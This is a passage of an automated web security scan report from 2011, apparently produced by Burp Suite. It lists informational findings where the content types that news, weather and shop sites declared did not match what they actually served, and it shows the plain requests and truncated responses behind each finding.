if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669");

25.15. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i.usatoday.net
Path:   /_common/_scripts/_community/lib/usl.photo.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /_common/_scripts/_community/lib/usl.photo.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 13 Jul 2007 17:19:19 GMT
Accept-Ranges: bytes
ETag: "80546f271c5c71:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5709


usl.photoUploadUrl="http:/"+"/sitelife.usatoday.com/ver1.0/Photo/PhotoUploadFrame.rails"
usl.photoDetailsUrl="http:/"+"/sitelife.usatoday.com/ver1.0/Photo/PhotoAddDetails.rails"
usl.photoUploadTempla
...[SNIP]...

25.16. http://mobile.fox8live.com/ScriptResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mobile.fox8live.com
Path:   /ScriptResource.axd

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ScriptResource.axd?d=pMQ-lpEot1tTVlk8V30klJ_A0JoWcJGdQS1rQAiV0HcZl4MzVvDd9HqJJl93TSR_4idYdU_v17EjMyBTV6P8JBp75wCZ_yOc3uN2Kew_7ZuJCK8jXzSrzeBVywI5kheZIuGOhnY4UX70WtRVgSIinwKfa3g1&t=ffffffffb8d25ab8 HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://mobile.fox8live.com/BlackBerry/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:47 GMT
Content-Length: 94

var Sys = new Array();Sys.Application = new Array();Sys.Application.initialize = function(){};

25.17. http://radar.weather.gov/Conus/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /Conus/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Conus/images/favicon.ico HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Nov 2006 13:34:08 GMT
Server: Apache
X-Cache-TTL: 85977
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=iso-8859-1
X-Cached-Time: Wed, 06 Apr 2011 16:15:29 GMT
Cache-Control: max-age=77447
Expires: Tue, 10 May 2011 13:07:32 GMT
Date: Mon, 09 May 2011 15:36:45 GMT
Connection: close

..............(.......(....... ...............G...G............R7...f...^......}l.........................iQ...............d.wwuu.Wwwwv~ug.gwwxW..u.ww.....cW|U....UgV~.@...5c...    ..\V......V........U.
...[SNIP]...

25.18. http://radar.weather.gov/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://radar.weather.gov
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8
Server: Apache
Last-Modified: Wed, 19 Apr 2006 14:34:18 GMT
Date: Mon, 09 May 2011 15:38:01 GMT
Connection: close

..............(.......(....... ........................................5*..hf..v*..p................p............................f......f...........z..~.I.8.........}... ...k....3.?..................1
...[SNIP]...

25.19. http://shop.npr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.npr.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.1.10.1304955581; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:03 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: text/plain
Content-Length: 318

..............(.......(....... ...............................................................................................................................    .......    .......    .......    .......    .......    .
...[SNIP]...

25.20. http://shop.npr.org/resize.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.npr.org
Path:   /resize.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /resize.php?w=170&h=120&f=images/products/10135.jpg HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: image/jpeg
Content-Length: 9640

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...

25.21. https://shop.npr.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:44:22 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Expires: Fri, 21 Dec 2020 00:00:00 GMT
Cache-Control: public, no-transform
Connection: close
Content-Type: text/plain
Content-Length: 318

..............(.......(....... ...............................................................................................................................    .......    .......    .......    .......    .......    .
...[SNIP]...

25.22. https://shop.npr.org/resize.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /resize.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /resize.php?w=222&h=35&f=content/cache/skins/npr/images/image-logo.jpg HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Referer: https://shop.npr.org/index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=one_page_checkout&start=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:44:12 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 7788
Connection: close
Content-Type: image/jpeg

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...

25.23. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:33 GMT
Connection: close
Content-Length: 94369

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

25.24. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /PointRoll/Ads/PRScript.dll?v=129&pos=0&init=1&delay=0&push=0&set=2&bye=1 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1278576G80420110421221132&cid=1472985&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b02/3/0/*/j%3B240265126%3B0-0%3B0%3B60978287%3B4307-300/250%3B41844694/41862481/1%3B%3B~sscs=%3F$CTURL$&time=1|10:39|-5&r=0.699075760319829&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 12976
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...

25.25. http://trc.taboolasyndication.com/usatoday/trc/2/json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/trc/2/json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /usatoday/trc/2/json?list-id=rbox-t2v&id=746&list-size=3&uim=rbox-t2v&intent=u&uip=rbox-t2v&item-id=46732364&item-type=text&item-url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&page-id=3aaa656500e8a4b6125b0c5e5138f55323e20348&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989&uid=d80f7856-eeab-487a-988c-f15ce2ff8eb0&cv=4-6-12-44791-2054596&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415;Path=/usatoday/
Set-Cookie: taboola_wv=;Path=/usatoday/;Expires=Tue, 08-May-12 15:36:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 3450

trc_json_response =
{"trc":{"req":"35eb06aeafeca714ebec05bbb325c74c","session-id":"923a143436baa4e0bd9cd36ac2e2bd5f","session-data":"v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

25.26. http://widgets.macroaxis.com/widgets/content.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://widgets.macroaxis.com
Path:   /widgets/content.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /widgets/content.jsp?t=26&f=f&url=http%3A//www.hnedata.net/features/tr_stock_charts HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=4DCCBC38AE7AB60DE732C89671BAF0FB; Path=/
Content-Length: 47
Content-Type: text/html;charset=ISO-8859-1


MyXssMagic.serverResponse(['1']);

25.27. http://wvue.web.entriq.net/nw/dpm/loadplayer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache
X-Host: w4
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:15 GMT
Content-Type: text/html
Content-Length: 59938

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_0.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.en
...[SNIP]...

25.28. http://www.collegesurfing.com/js/MGEProgramCategoryDropDown.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.collegesurfing.com
Path:   /js/MGEProgramCategoryDropDown.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/MGEProgramCategoryDropDown.php HTTP/1.1
Host: www.collegesurfing.com
Proxy-Connection: keep-alive
Referer: http://www.collegesurfing.com/searchbox-mge-us.php?id=12828088&type=MGEUSDEST&style=&affiliatesearchboxid=7851&program_type=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; PHPSESSID=3eicgiuhi2dvuo76dhkvncnek6; AFF_ID=6; AFF_URL=http%3A%2F%2Fwww.collegesurfing.com%2Fsearchbox-mge-us.php%3Fid%3D12828088%26type%3DMGEUSDEST%26style%3D%26affiliatesearchboxid%3D7851%26program_type%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20756

   grouping = '';

   function getCareer(el){
       if(typeof(el) == "undefined"){
           el = document.mainform;
       }
       if(typeof(el) == "undefined" || typeof(el) == null ){
           return false;
       }
       
       pos = el.pro
...[SNIP]...

25.29. http://www.macroaxis.com/widgets/url.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=189FB444592D30A261C6DE609DF507AC; Path=/
Content-Length: 2449
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...

25.30. http://www.srh.noaa.gov/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.srh.noaa.gov
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 118
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:37:22 GMT
Content-Length: 318
Content-Type: text/plain; charset=UTF-8
Server: Apache
Last-Modified: Wed, 19 Apr 2006 14:34:18 GMT
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

..............(.......(....... ........................................5*..hf..v*..p................p............................f......f...........z..~.I.8.........}... ...k....3.?..................1
...[SNIP]...

25.31. http://www.usatoday.com/community/tags/GetLinkedByline.ashx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.usatoday.com
Path:   /community/tags/GetLinkedByline.ashx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /community/tags/GetLinkedByline.ashx?id=46732364 HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:19 GMT
Content-Length: 239

By <a class="linkedBylineName" href="http://content.usatoday.com/topics/reporter/William+M.+Welch">William M. Welch</a> and <a class="linkedBylineName" href="http://content.usatoday.com/topics/reporte
...[SNIP]...

26. Content type is not specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

